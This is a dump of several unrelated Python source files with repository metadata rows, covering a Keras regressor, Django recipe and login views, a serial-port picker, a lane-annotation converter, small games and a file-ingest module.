        print ("----------")
        best_features_indexes.index = features_df_merged.index
        print ("top")
        print (best_features_indexes.sort_values (by = 'Coefficient', ascending = False).head (10).to_csv (float_format = '%.5f'))
        print ("worst")
        print (best_features_indexes.sort_values (by = 'Coefficient', ascending = True).head (10).to_csv (float_format = '%.5f'))
        # Results merged by label
        print ("by label")
        print ("----------")
        print ("top")
        print (features_df_merged.sort_values (by = 'Coefficient', ascending = False).head (10)[unique_labels].to_csv (float_format = '%.5f'))
        print ("worst")
        print (features_df_merged.sort_values (by = 'Coefficient', ascending = True).head (10)[unique_labels].to_csv (float_format = '%.5f'))
if __name__ == "__main__":
    # Entry point when run as a script.
    main ()
| [
"Smolky@gmail.com"
] | Smolky@gmail.com |
9545a1c677720b2cc1d1a08ee3eaaa268a423759 | 390d19c3159133d8c688396cb11b4ed3f8178d09 | /BaekJoon/APS_2019/2669_직사각형 네개의 합집합의 면적.py | 1d2b01330c52119bf983190b61936d5a7dcf040a | [] | no_license | JJayeee/CodingPractice | adba64cbd1d030b13a877f0b2e5ccc1269cb2e11 | 60f8dce48c04850b9b265a9a31f49eb6d9fc13c8 | refs/heads/master | 2021-08-16T17:14:01.161390 | 2021-07-16T00:42:18 | 2021-07-16T00:42:18 | 226,757,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py |
# BOJ 2669: area of the union of four axis-aligned rectangles on a
# 100x100 unit grid.  dwr marks each covered 1x1 cell.
dwr = [[0]*100 for _ in range(100)]
count = 0
for i in range(4):
    # Each rectangle is given as lower-left (xs, ys) and upper-right (xe, ye).
    xs, ys, xe, ye = map(int, input().split())
    for x in range(xs, xe):
        for y in range(ys, ye):
            if dwr[x][y] == 0:
                # Count every grid cell only the first time it is covered,
                # so overlapping regions are not counted twice.
                dwr[x][y] = 1
                count += 1
print(count)
| [
"jay.hyundong@gmail.com"
] | jay.hyundong@gmail.com |
0d2a16d7181c1db586115e68bf2682e3051a7bef | e9bc2f88c0849c7a00d7f6a443d23e9148b0fe4e | /hc05config/port_select.py | 3f839191157c5f7505ab32ae4d280b0163169006 | [
"MIT"
] | permissive | DenisSouth/HC-05-ConfigTool | 03908031eee02f123708ff25508b7dcd0707bc73 | fb03e8057a2bdb88dcfc793889d76781d04dfeb7 | refs/heads/master | 2021-05-17T14:30:16.804628 | 2020-03-28T15:27:57 | 2020-03-28T15:27:57 | 250,822,752 | 0 | 0 | MIT | 2020-03-28T15:00:00 | 2020-03-28T14:59:59 | null | UTF-8 | Python | false | false | 900 | py | from serial.tools.list_ports import comports as listPorts
from serial.serialutil import SerialException
from .AT_command import *
from .input_lib import get_input
def getPortName(info_msg):
    """Interactively ask the user for a serial port and return its device name.

    Lists the detected ports as a 1-based menu plus a final "rescan"
    entry, and loops (rescanning) until an actual port is chosen.
    """
    while True:
        print("Available Ports:")
        ports = [port.device for port in listPorts()]
        for i, port in enumerate(ports):
            print("{}: {}".format(i + 1, port))
        # BUG FIX: the original used "{}".format(i + 2) here, which raises a
        # NameError when no serial port is connected (the loop above never
        # runs, so i is unbound).  len(ports) + 1 is the same value whenever
        # ports exist and also works for an empty list.
        print("{}: Rescan serial port\n".format(len(ports) + 1))
        selection = get_input(int, info_msg, "The input is invalid, please enter again", range(1, len(ports) + 2)) - 1
        if selection in range(len(ports)):
            return ports[selection]
        print()
def getPort(info_msg):
    """Keep prompting for a port until one can actually be opened.

    Returns an open SerialATMode instance configured at 38400 baud,
    8N1, with a 0.5 second timeout.
    """
    while True:
        chosen = getPortName(info_msg)
        try:
            return SerialATMode(chosen, 38400, timeout=0.5,
                                parity=serial.PARITY_NONE,
                                stopbits=serial.STOPBITS_ONE)
        except SerialException:
            # Port exists but cannot be opened (likely held by another
            # program); let the user pick again.
            print("\"{}\" is currently busy, please select other port\n".format(chosen))
| [
"josephlamyip@gmail.com"
] | josephlamyip@gmail.com |
8d78ceb59cff063599be6331c747a3e13bbbd508 | 19edbb9d8e48fe0e3f610a9964c65b63a8657c6e | /kerasNet.py | 30d2a627fdb46e1acc456e99a2f6a422abf35368 | [] | no_license | iaakhter/sensorimotorProject | 73c94b757c07b5005a16148c8606b02704da0a97 | 2d9efe3826d12fff1414815985549a48f081daac | refs/heads/master | 2021-01-11T06:38:07.626131 | 2017-04-18T17:45:57 | 2017-04-18T17:45:57 | 81,383,967 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,552 | py | from keras.utils import np_utils
from keras.models import Sequential
from keras.models import load_model
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
import processImages
import numpy as np
class kerasNet:
def __init__(self):
self.imagePath ="trainingData/trainingFeatureXY.txt"
self.labelPath = "trainingData/trainingLabelXY.txt"
self.numOfExamples = self.getNumberOfTrainingExamples()
self.numOfFeatures = 4
self.numOfLabels = 2
def train(self):
print "Training keras with ", self.numOfExamples, " examples "
xTrain = processImages.constructXFromTargetFocusLocations(self.numOfExamples, self.numOfFeatures, self.imagePath)
yTrain = processImages.convertLabelToArray(self.numOfExamples, self.numOfLabels, self.labelPath)
self.model = Sequential()
self.model.add(Dense(10, input_shape=(4,), activation='relu', use_bias=True))
# self.model.add(Dropout(0.8))
# self.model.add(Dense(5, activation='relu'))
# self.model.add(Dropout(0.8))
# self.model.add(Dense(64, activation='relu'))
self.model.add(Dense(2))
self.model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mse'])
history = self.model.fit(xTrain, yTrain,
batch_size=128,
epochs=1000,
verbose=0,
validation_split=0.8)
score = self.model.evaluate(xTrain, yTrain, verbose=0)
print('Test accuracy:', score[1])
self.model.save('myKerasNet.h5')
def predict(self, xTest):
xTest = np.reshape(xTest, (1,4))
yhat = self.model.predict(xTest)
return yhat
def getNumberOfTrainingExamples(self):
f = open(self.labelPath, 'r')
line = f.readline()
numExamples = 0
while line:
numExamples += 1
line = f.readline()
f.close()
return numExamples
if __name__ == "__main__":
model = kerasNet()
model.train()
Xtest = processImages.constructXFromTargetFocusLocations(10, 4, "testData/testingFeatureXY.txt")
ytest = processImages.convertLabelToArray(10, 2, "testData/testingLabelXY.txt")
# Xtest = np.reshape(Xtest, (10,4))
for i in range(len(Xtest)):
prediction = model.predict(Xtest[i,:])
print "prediction: ", prediction
print "true value: ", ytest[i,:]
| [
"ariadna.estrada42@gmail.com"
] | ariadna.estrada42@gmail.com |
22e1a1b713c1d6e6b129ad2751ba27359fa8d981 | 0b5400b2c9ace176ce8f3d21e4a4a19808b4de63 | /restaurant/models.py | ed5400cfe7eec52462b544f0f9ecd6a9b2dcb37b | [
"MIT"
] | permissive | turgayh/Recipe-Share | 771a5b0ef9ebd9b65b2d3d6b807bcc7d8d59a00b | 858eb3e0e21c11b62249fbc9490cd7bb1f244b9e | refs/heads/master | 2020-12-15T14:35:12.613063 | 2020-02-03T15:04:16 | 2020-02-03T15:04:16 | 235,137,994 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | from django.db import models
from django.contrib.auth.models import User
from taggit.managers import TaggableManager
STATUS = (
(0, "Draft"),
(1, "Publish")
)
class Recipe(models.Model):
title = models.CharField(max_length=200, unique=True)
slug = models.SlugField(max_length=200, unique=True)
author = models.ForeignKey(
User, on_delete=models.CASCADE, related_name='recipe_posts')
updated_on = models.DateTimeField(auto_now=True)
content = models.TextField()
created_on = models.DateTimeField(auto_now_add=True)
status = models.IntegerField(choices=STATUS, default=0)
cover = models.ImageField(upload_to='images/', default="")
objects = models.Manager()
class Meta:
ordering = ['-created_on']
def __str__(self):
return self.title
| [
"turgayh@itu.edu.tr"
] | turgayh@itu.edu.tr |
16a037ed183da42d1408b56c0feeecf330f98bdc | c4aa7158cc93788045e244ee94b3931d15feb2cd | /src/todo_app/urls.py | 67bef8c44ac8eb7cbb5719c72b14d17b92ebb5c5 | [] | no_license | sahinmurat/django-todo | 06b91acfcdd44d23d802945f21d07daa993f3e6f | 4b240105473312e3ad42f38c9aec0e935aee8017 | refs/heads/main | 2023-03-15T13:36:55.533285 | 2021-03-15T19:40:55 | 2021-03-15T19:40:55 | 324,801,047 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | from django.urls import path
from .views import home, todo_create, todo_update, todo_delete,list
urlpatterns = [
path('', home, name = 'home'),
path('list/', list, name = 'list'),
path('create/',todo_create, name = 'create'),
path('<int:id>/delete/',todo_delete, name = 'delete'),
path('<int:id>/update/', todo_update, name = 'update'),
]
| [
"yazilimogren1111@gmail.com"
] | yazilimogren1111@gmail.com |
7d26a06ea15228d68269d68c0c454fd6b9324417 | b2a8c6cbb599959268de7d8936ab016cef981f74 | /server/keyword_spotting_service.py | f14be32414f7949ff5b7ba59bc2d82a7e34e3519 | [] | no_license | weimingtom/Speech-Recognition_mod | 56235e460b40d5faacf2c6af7a8c73fed912fdc3 | ef5304639ff0c52ec4d7a37db240c585d0aede71 | refs/heads/master | 2023-02-13T22:09:52.061788 | 2021-01-09T12:14:02 | 2021-01-09T12:14:02 | 318,730,932 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,833 | py | import librosa
import tensorflow as tf
import numpy as np
import json
import sys
SAVED_MODEL_PATH = "model.h5"
SAMPLES_TO_CONSIDER = 22050
LABEL_DATA_PATH = "label_data.json"
WAV_PATH = "tests/left.wav"
class _Keyword_Spotting_Service:
model = None
_mapping = {}
_instance = None
def __init__(self):
self.load_label_data()
def load_label_data(self):
with open(LABEL_DATA_PATH, "r") as fp:
data = json.load(fp)
labels = data["labels"]
words = data["words"]
for index in range(len(labels)):
# print("labels[index] == ", labels[index])
self._mapping[labels[index]] = words[index]
for i in range(labels[index]):
if i not in self._mapping.keys():
self._mapping[i] = "N/A"
print("[load_label_data] _mapping == ", self._mapping)
def predict(self, file_path):
# extract MFCC
MFCCs = self.preprocess(file_path)
# we need a 4-dim array to feed to the model for prediction: (# samples, # time steps, # coefficients, 1)
MFCCs = MFCCs[np.newaxis, ..., np.newaxis]
# get the predicted label
predictions = self.model.predict(MFCCs)
predicted_index = np.argmax(predictions)
predicted_keyword = self._mapping[predicted_index]
return predicted_keyword
def preprocess(self, file_path, num_mfcc=13, n_fft=2048, hop_length=512):
# load audio file
signal, sample_rate = librosa.load(file_path)
if len(signal) >= SAMPLES_TO_CONSIDER:
# ensure consistency of the length of the signal
signal = signal[:SAMPLES_TO_CONSIDER]
# extract MFCCs
MFCCs = librosa.feature.mfcc(signal, sample_rate, n_mfcc=num_mfcc, n_fft=n_fft,
hop_length=hop_length)
return MFCCs.T
def Keyword_Spotting_Service():
# ensure an instance is created only the first time the factory function is called
if _Keyword_Spotting_Service._instance is None:
_Keyword_Spotting_Service._instance = _Keyword_Spotting_Service()
_Keyword_Spotting_Service.model = tf.keras.models.load_model(SAVED_MODEL_PATH)
return _Keyword_Spotting_Service._instance
if __name__ == "__main__":
# create 2 instances of the keyword spotting service
kss = Keyword_Spotting_Service()
kss1 = Keyword_Spotting_Service()
# check that different instances of the keyword spotting service point back to the same object (singleton)
assert kss is kss1
print("----- keyword_spotting_service ------")
# make a prediction
if len(sys.argv) >= 2:
WAV_PATH = sys.argv[1]
keyword = kss.predict(WAV_PATH)
print("[keyword_spotting_service] WAV_PATH: ", WAV_PATH, ", predict result: ", keyword)
| [
"weimingtom@qq.com"
] | weimingtom@qq.com |
e7f1c2f893c077d760fbd104757e79d77cfb0164 | 05180b33f7d81fc90d2e72a319d4f8c1c52fb9ca | /classification/compare_models.py | aec56ee812836868d55769e65a66d02f733da453 | [
"MIT"
] | permissive | reber199/denn-ijcai | 14273fe06b9976f84a069790f50009444f665919 | 6431f699b7d9b4e4fbb9ca71f41dbdecfd34378c | refs/heads/master | 2022-09-20T16:36:00.098713 | 2020-06-04T21:22:29 | 2020-06-04T21:22:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,843 | py | '''
This files creates a csv comparing all the models in a given folder.
'''
import h5py
import matplotlib
# matplotlib.use('tkagg')
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(font_scale=1.9, rc={'text.usetex': True})
sns.set_style('whitegrid')
import pandas as pd
from tqdm import tqdm
import argparse as ap
import numpy as np
import tools
import json
from pathlib import Path
import os
import stats
# Creating the parser to use parameters
parser = ap.ArgumentParser()
parser.add_argument('--folder', type=str, required=True, help='Folders to consider when creating the figures')
parser.add_argument('--prefix', type=str, help='prefix to use for folders', required=True)
parser.add_argument('--test', type=str, default='mnist')
parser.add_argument('--entropy_evaluation', type=str, default='notmnist')
parser.add_argument('--n_nets', default=[10], nargs='+', required=False)
parser.add_argument('--save', action='store_true')
args = parser.parse_args()
def work(p, dirname, args):
r'''
Here we want to compute the entropies and KL divergences for all experiments, wrt the baseline
'''
with h5py.File(p / 'stats/{}.h5'.format(args.test), 'r') as fd:
entro_test_experiment_vals = fd.get('std')[:]
with h5py.File(p / 'stats/{}.h5'.format(args.entropy_evaluation), 'r') as fd:
entro_evaluation_experiment_vals = fd.get('std')[:]
# We compute the mean entropy on the test and evaluation datasets for our experiment
mean_entro_experiment_test = np.mean(entro_test_experiment_vals)
mean_entro_experiment_evaluation = np.mean(entro_evaluation_experiment_vals)
# Now we compute the standard deviation of the entropy on the test and evaluation datsets for our experiment
std_entro_experiment_test = np.std(entro_test_experiment_vals)
std_entro_experiment_evaluation = np.std(entro_evaluation_experiment_vals)
# Return the values
return np.array([[mean_entro_experiment_test, std_entro_experiment_test, mean_entro_experiment_evaluation, std_entro_experiment_evaluation]])
# ===============================================================================
# Going through the files and creating the figures
# ===============================================================================
# loop over all folders and if there is no std.h5 file we create it
folder = Path(args.folder)
filenames = []
results = np.empty(shape=(0,4))
for dirname in tqdm(os.listdir(folder)):
if os.path.isdir(folder / dirname):
if dirname[:len(args.prefix)] == args.prefix:
result = work(folder / dirname, dirname, args)
results = np.concatenate((results, result), axis=0)
filenames.append(dirname)
# Finally we save a csv file
df = pd.DataFrame(results, index=filenames)
df.to_csv(folder / 'stats_{}.csv'.format(args.prefix))
| [
"maximewabartha@gmail.com"
] | maximewabartha@gmail.com |
7ed367d4fe93f317195ea73b4925dcb5f4c4e690 | c14d795c9ce456d169c6d99119d68eb8bc7fc11b | /HelloWorlds/download_webpage.py | 019d70fc9a286f31cfa6750c4d70c2b206c93176 | [] | no_license | BingW/MyDoc | 706c93381377f7d766e7332d13be3dfd410bbbfe | 97d8031d32822396bd6b1bef6f846c6969a75fc6 | refs/heads/master | 2020-05-18T12:37:11.420959 | 2012-04-25T17:04:30 | 2012-04-25T17:04:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,103 | py | import mechanize
from time import sleep
#Make a Browser (think of this as chrome or firefox etc)
br = mechanize.Browser()
#visit http://stockrt.github.com/p/emulating-a-browser-in-python-with-mechanize/
#for more ways to set up your br browser object e.g. so it look like mozilla
#and if you need to fill out forms with passwords.
# Open your site
br.open('http://pypi.python.org/pypi/xlwt')
f=open("source.html","w")
f.write(br.response().read()) #can be helpful for debugging maybe
filetypes=[".zip",".exe",".tar.gz"] #you will need to do some kind of pattern matching on your files
myfiles=[]
for l in br.links(): #you can also iterate through br.forms() to print forms on the page!
for t in filetypes:
if l.url.endswith(t):
myfiles.append(l)
def downloadlink(l):
f=open(l.text,"w") #perhaps you should open in a better way & ensure that file doesn't already exist.
br.click_link(l)
f.write(br.response().read())
print l.text," has been downloaded"
#br.back()
for l in myfiles:
sleep(1) #throttle so you dont hammer the site
downloadlink(l)
| [
"toaya.kase@gmail.com"
] | toaya.kase@gmail.com |
b353b707cacb15d728f60c135063e4f6b488eee8 | 5c3ecd6974ebd714c42869081313614ba4f602a7 | /projects/exercises/empty_screen/empty_screen.py | 620dbe9556d9f61f3806280d4a7639152471a304 | [] | no_license | iloverugs/pcc_2e_student | fd491cb4d3c0546718554073a98386d8d7a499ec | 1c3ad17467c3d8deea9f3566b5eb66cbc6358a6d | refs/heads/main | 2023-04-13T01:17:21.164991 | 2021-04-23T01:09:23 | 2021-04-23T01:09:23 | 354,342,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 878 | py | import sys
import pygame
class EmptyScreen:
"""Uses pygame to create an empty screen, and detects KEY_DOWN."""
def __init__(self):
"""Initialize the game, and create game resources."""
pygame.init()
self.screen = pygame.display.set_mode((1200, 800))
pygame.display.set_caption("Empty Screen")
def run_game(self):
"""Start the main loop for the game."""
while True:
self._check_events()
pygame.display.flip()
def _check_events(self):
"""Respond to keypress events."""
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
elif event.type == pygame.KEYDOWN:
print(event.key)
if __name__ == '__main__':
# Make a game instance, and run the game.
es = EmptyScreen()
es.run_game()
| [
"81831508+iloverugs@users.noreply.github.com"
] | 81831508+iloverugs@users.noreply.github.com |
6fb2c6f9c833dee21c52f53524de44a2639ac6c3 | 9f2b8f38b31f3b7e234bd5d4868c6e6bf134f5be | /custom_auth/views.py | 8bd70469476b25adcc14ef370ff6002dd1e2497e | [] | no_license | a-pompom/Django_login | 436b4d94b396f6eb24deb470306ddbf6d0ac7e96 | 125288e754cf44b0aeba33bc792d17c7d695ef8a | refs/heads/master | 2022-12-26T10:32:32.974480 | 2020-07-31T11:27:04 | 2020-07-31T11:27:04 | 277,287,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,317 | py | from custom_auth.exceptions import LoginFailureException
from django.shortcuts import render, redirect
from django.views import View
from django.contrib.auth import login, logout
from django.contrib.auth.hashers import make_password
from django.conf import settings
from django.http import HttpRequest, HttpResponse
from typing import cast
from .forms import LoginForm, SignUpForm
from .backend import AuthBackend
from .models import User
class LoginView(View):
""" ログイン画面用View
"""
def get(self, request: HttpRequest) -> HttpResponse:
""" ログイン画面表示処理
Parameters
----------
request: HttpRequest
GETリクエスト情報
Returns
-------
response: HttpResponse
ログイン画面表示用レスポンス
"""
context = {
'form': LoginForm()
}
return render(request, 'login/login.html', context)
def post(self, request: HttpRequest) -> HttpResponse:
""" ログイン処理
Parameters
----------
request : HttpRequest
POSTリクエスト情報
Returns
-------
HttpResponse
ログイン失敗 -> ログイン画面
ログイン成功 -> トップ画面
Raises
------
LoginFailureException
ユーザ名・パスワードがDBに存在するものと合致しなかった場合に送出 ログイン画面へ再遷移
"""
form = LoginForm(request.POST)
# ユーザ認証
try:
if not form.is_valid():
raise LoginFailureException()
user = AuthBackend().authenticate(
request,
username=form.cleaned_data['username'],
password=form.cleaned_data['password']
)
# ログイン失敗
except LoginFailureException:
form.add_error(None, 'ユーザ名またはパスワードが間違っています。')
context = {'form': form}
return render(request, 'login/login.html', context)
login(request, user, 'custom_auth.backend.AuthBackend')
return redirect(settings.LOGIN_SUCCESS_URL)
class SignUpView(View):
""" ユーザ登録処理用View
"""
def get(self, request: HttpRequest) -> HttpResponse:
""" ユーザ登録画面表示
Parameters
----------
request : HttpRequest
GETリクエスト情報
Returns
-------
HttpResponse
ユーザ登録画面
"""
context = {
'form': SignUpForm()
}
return render(request, 'signup/signup.html', context)
def post(self, request: HttpRequest) -> HttpResponse:
""" ユーザ登録処理
Parameters
----------
request : HttpRequest
POSTリクエスト情報
Returns
-------
HttpResponse
ユーザ登録失敗 -> ユーザ登録画面
ユーザ登録成功 -> ログイン画面
"""
form = SignUpForm(request.POST)
# 登録失敗
if not form.is_valid():
context = {
'form': form
}
return render(request, 'signup/signup.html', context)
# ユーザ登録
user = User(
username=form.cleaned_data['username'],
password=make_password(form.cleaned_data['password']),
is_admin=False,
)
user.save()
return redirect('login:login')
class TopView(View):
""" トップ画面用View
"""
def get(self, request: HttpRequest) -> HttpResponse:
""" トップ画面表示
Parameters
----------
request : HttpRequest
GETリクエスト
Returns
-------
HttpResponse
未ログイン -> ログイン画面
ログイン済み -> トップ画面 権限に応じて出しわけ
"""
user = cast(User, request.user)
# 認証済みか
if not user.is_authenticated:
return redirect('login:login')
# 管理者か
if user.is_admin:
return render(request, 'top/top_admin.html')
return render(request, 'top/top.html')
class LogoutView(View):
""" ログアウト処理用View
"""
def get(self, request: HttpRequest) -> HttpResponse:
""" ログアウト処理
Parameters
----------
request : HttpRequest
GETリクエスト
Returns
-------
HttpResponse
ログイン画面
"""
logout(request)
return redirect('login:login')
def handler404(request: HttpRequest, exception: Exception) -> HttpResponse:
""" 404ページを表示
Parameters
----------
request : HttpRequest
存在しない画面へのリクエスト
exception : Exception
遷移元の例外
Returns
-------
HttpResponse
404ページ
"""
return render(request, 'widget_404.html', status=404)
| [
"aoi.matsuda.3x@gmail.com"
] | aoi.matsuda.3x@gmail.com |
173ca58a434c334f2487c1bf0d994d3395abcd30 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_11371.py | a3211135d7b87d8da37dd74f4338428a4d5ef5ce | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 47 | py | # Using python modules over Paramiko (SSH)
RMI
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
175900569e6f72b7a15b759386df0ac40461cd79 | 6edefe5706053a775b56a53460133240dc0c78a2 | /intro-code/robustos.py | 3d72098c38f82d4177262d9009646be5fc91fe3e | [] | no_license | jjconti/charla-intro-python | 0ff6ff705db9336a4666f45bf2dac9105cc6a16d | 1c800b7c17a994f283f8c587034e21b5079a028b | refs/heads/master | 2020-04-12T07:30:24.365128 | 2016-09-17T02:45:44 | 2016-09-17T02:45:44 | 58,327,490 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 524 | py | import random
def juego(n):
secreto = random.choice(range(n * 10))
intentos = []
intento = -1
while intento != secreto:
try:
intento = int(input('Adiviná: '))
except:
continue
intentos.append(intento)
if intento > secreto:
print('Más chico!')
else:
print('Más grande!')
print('Adivinaste!')
print('Intentos: {0}'.format(intentos))
try:
nivel = int(input('Nivel: '))
except:
nivel = 1
juego(nivel)
| [
"jjconti@gmail.com"
] | jjconti@gmail.com |
d0811e579f131e6ae78105539cd53d0ed54e3032 | 52afc11e1eb37a486a4e3a87b458cfe5ff72b8c9 | /data_prep/convert_json_via_tusimple.py | b1591a8a21ca818177d28051339ddc2c68743758 | [] | no_license | maftuhm/LaneNet | f000383430d30eb30e9b0ffb4f2b91ddfde98d5e | 0436b2992893e80d33651652637bc34954f4bac8 | refs/heads/master | 2023-01-07T04:28:43.893469 | 2020-10-27T03:59:47 | 2020-10-27T03:59:47 | 295,589,057 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,043 | py | import argparse
import json
import os
import glob
import numpy as np
import time
import cv2
from tqdm import tqdm
from matplotlib import pyplot as plt
class CreateLane:
def __init__(self, lane):
self.lane = lane
def clear(self, lane):
lane = set(lane)
self.lane = list(lane)
return self.lane
def sort(self, lane):
self.lane = sorted(lane, key = lambda y: y[1])
return self.lane
def interpolate(self, lane):
lane = self.clear(lane)
lane = self.sort(lane)
new_lane = []
for i in range(len(lane) - 1):
difx = abs(lane[i][0] - lane[i+1][0])
dify = abs(lane[i][1] - lane[i+1][1])
if difx > dify:
dif = difx
else:
dif = dify
x = np.linspace(lane[i][0], lane[i+1][0], dif, dtype = np.int32)
y = np.linspace(lane[i][1], lane[i+1][1], dif, dtype = np.int32)
new_lane.extend(list(zip(x.tolist(), y.tolist())))
lane = new_lane
lane = self.clear(lane)
lane = self.sort(lane)
return lane
def clear_ypoint(self, lane):
points = []
for i, point in enumerate(lane[:-1]):
if lane[i][1] != lane[i+1][1]:
points.append(point)
points.append(lane[-1])
self.lane = points
return self.lane
def clear_step(self, lane, point = 'y', size = (1920, 1080), step = 10):
if point == 'y':
param = size[1]
else:
return False
self.lane = [(x, y) for (x, y) in lane if y in range(0, param, step)]
return self.lane
def clear_duplicate(self, lane, point = 'y'):
points = []
for i, point in enumerate(lane[:-1]):
if lane[i][1] != lane[i+1][1]:
points.append(point)
points.append(lane[-1])
self.lane = points
return self.lane
def get(self):
self.interpolate(self.lane)
self.clear_step(self.lane)
self.clear_duplicate(self.lane)
return self.lane
def get_split(self):
lane = self.get()
x, y = [a[0] for a in lane], [a[1] for a in lane]
return x, y
class DictLanes(CreateLane):
dict_lanes = dict()
def __init__(self, lanes, index = 0):
super(CreateLane, self).__init__()
self.lanes = lanes
self.lane = lanes[index]
def min_max(self, lanes, point = 'y', size = (1920, 1080), step = 10):
width, height = 1920, 1080
min_y = [l[0][1] for l in lanes]
max_y = [l[len(l)-1][1] for l in lanes]
min_y, max_y = min(min_y), max(max_y)
return (min_y, max_y)
def get_lanes(self):
new_lanes = []
for lane in self.lanes:
new_lane = CreateLane(lane).get()
new_lanes.append(new_lane)
self.lanes = new_lanes
return self.lanes
def get(self):
lanes = self.get_lanes()
min_y, max_y = self.min_max(lanes)
h_samples = list(range(min_y, max_y + 1, 10))
new_lanes = []
for lane in lanes:
new_lane = []
i = 0
for h in h_samples:
if h in [l[1] for l in lane]:
new_lane.append(lane[i][0])
i += 1
else:
new_lane.append(-2)
new_lanes.append(new_lane)
self.dict_lanes['lanes'] = new_lanes
self.dict_lanes['h_samples'] = h_samples
return self.dict_lanes
class JsonLanes:
def __init__(self, src_dir):
self.src_dir = src_dir
def get(self):
with open(self.src_dir) as f:
json_file = json.load(f)
data_lanes = []
for index in json_file:
data = {}
regions = json_file[index]['regions']
filename = json_file[index]['filename']
lanes = []
if len(regions) == 0:
print("Image " + filename + " is not anotated.")
print(json_file[index])
break
else:
for lane in regions:
x = lane['shape_attributes']['all_points_x']
y = lane['shape_attributes']['all_points_y']
lane = [(a, b) for (a, b) in zip(x, y)]
lanes.append(lane)
dict_lanes = DictLanes(lanes).get()
data['lanes'] = dict_lanes['lanes']
data['h_samples'] = dict_lanes['h_samples']
data['raw_file'] = 'clips/' + filename.split('.')[0] + '/20.jpg'
data_lanes.append(data)
return data_lanes
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--json_path", type=str)
parser.add_argument("--save_samples", type=bool, default=False)
args = parser.parse_args()
return args
def main():
args = parse_args()
json_path = args.json_path
image_path = '/'.join(os.path.split(json_path)[:-1])
DATA = JsonLanes(args.json_path).get()
with open(image_path + '/label_lanenet_' + time.strftime('%d%m%Y_%H%M', time.localtime()) + '.json', 'w') as json_file:
for line in DATA:
json_file.write(json.dumps(line) + '\n')
if args.save_samples:
samples_dir = image_path + '/samples'
os.makedirs(samples_dir, exist_ok=True)
for image_label in tqdm(DATA):
gt_lanes = image_label['lanes']
y_samples = image_label['h_samples']
raw_file = image_label['raw_file']
lanes_vis = [[(x, y) for (x, y) in zip(lane, y_samples) if x >= 0] for lane in gt_lanes]
img_raw = raw_file.split('/')[-2]
img = plt.imread(image_path + '/' + raw_file)
for lane in lanes_vis:
for pt in lane:
cv2.circle(img, pt, radius=5, color=(0, 255, 0), thickness=-1)
plt.imsave(samples_dir + '/' + img_raw +'.jpg', img)
if __name__ == '__main__':
main() | [
"maftuh.mashuri16@mhs.uinjkt.ac.id"
] | maftuh.mashuri16@mhs.uinjkt.ac.id |
36656deb12946ccaefb8ff140cb35080590a0bce | 7f92a710bc893a6dfc3cf69525368106caae24d9 | /leetcode/length of last word.py | c6cb52aba6f9ace7b4ff8683cfd8cc683e71e668 | [] | no_license | hi-august/pyexercises | a64e45412a741aa1a883008d8c39e7664d468551 | 94a731fc517682013e96bbccd69efe90728eb788 | refs/heads/master | 2021-10-22T07:11:57.899710 | 2019-03-09T02:48:12 | 2019-03-09T02:48:12 | 22,276,989 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 216 | py | # coding=utf-8
'''
Given s = "Hello World",
return 5.
'''
def lengthOfLastWord(s):
return len(s.strip().split()[-1])
if __name__ == '__main__':
s = "Hello World"
print lengthOfLastWord(s)
| [
"1927064778@qq.com"
] | 1927064778@qq.com |
b6cecd2502f9b14292173ff0007097c27af1b3aa | 9acdaacc569720b745d4f8b06c4181a8fe3f0590 | /build/lib/mediastruct/ingest.py | 7ede3b150facfbe98fa8bd9ca54eff5b51bac54e | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | joeljohnston/mediastruct | bbb2861715863aeaee3012dbd6da9638ec662198 | 5c7937450edebe6047198afa799e664b344cd2fe | refs/heads/master | 2023-01-22T12:53:07.230458 | 2023-01-05T12:45:39 | 2023-01-05T12:45:39 | 146,010,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,790 | py | import os
import sys
import time
import shutil
import logging
from glob import glob
log = logging.getLogger(__name__)
log.info('Ingest - Launching the Ingest Class')
class ingest(object):
'''the ingest class manages contents entering the workflow by organizing files by their last modified date
into the working directory / media directory'''
#class init
def __init__(self,_sourcedir,_destdir):
#setup logging for this child class
log = logging.getLogger(__name__)
ingest.mvrnm(self,_sourcedir,_destdir)
#Move and Rename as Necessary
def mvrnm(self,sourcedir,destdir):
'''this function ensures that no data is lost via file collisions as files are moved into the working dir
by renaming them with a .<unixdatetimestamp. addition to the existing filename'''
log.info("Ingest - Directory root: %s" % (sourcedir))
#ensure the source directory exists
if os.path.isdir(sourcedir):
#change parser to the sourcedir
#os.chdir(sourcedir)
#loop through contents of the ingest directory
for folder, subs, files in os.walk(sourcedir):
for filename in files:
#split the filename up
ext = os.path.splitext(filename)[1][1:]
newfile = os.path.splitext(filename)[0]
#rename the file with a unique timestamp based name
millis = int(round(time.time() * 1000))
newfilename = "%s.%s.%s" % (newfile, millis, ext)
log.info("Ingest - oldfilename: %s" % (filename))
log.info("Ingest - newfilename: %s" % (newfilename))
#new file path
